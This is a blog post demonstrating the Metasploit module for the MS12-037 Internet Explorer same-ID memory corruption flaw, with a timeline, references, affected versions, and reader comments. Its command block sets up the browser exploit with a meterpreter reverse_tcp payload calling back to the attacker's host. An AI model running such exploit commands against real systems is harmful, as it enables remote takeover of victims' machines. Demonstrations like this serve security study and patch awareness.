MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-13

PoC provided by :

Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.

Commands :

use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

3 thoughts on “MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo”

wow says:

19/08/2012 at 22:42

Are you sure that you have remove KB2699988 how is MS12-037 patch ?
fudcrypter2013 says:

19/08/2012 at 22:34

Hello

exploit is not running

i tested a XP SP3 on Internet Explorer 8 (8.0.6001.18702)

what is this msvcrt ROP ?

My IE8 is crashed.
guerilla7 says:

13/06/2012 at 23:15

Another reason to ditch Windows XP and/or use EMET 2.0 🙂

Comments are closed.

Eric Romang Blog

aka wow on ZATAZ.com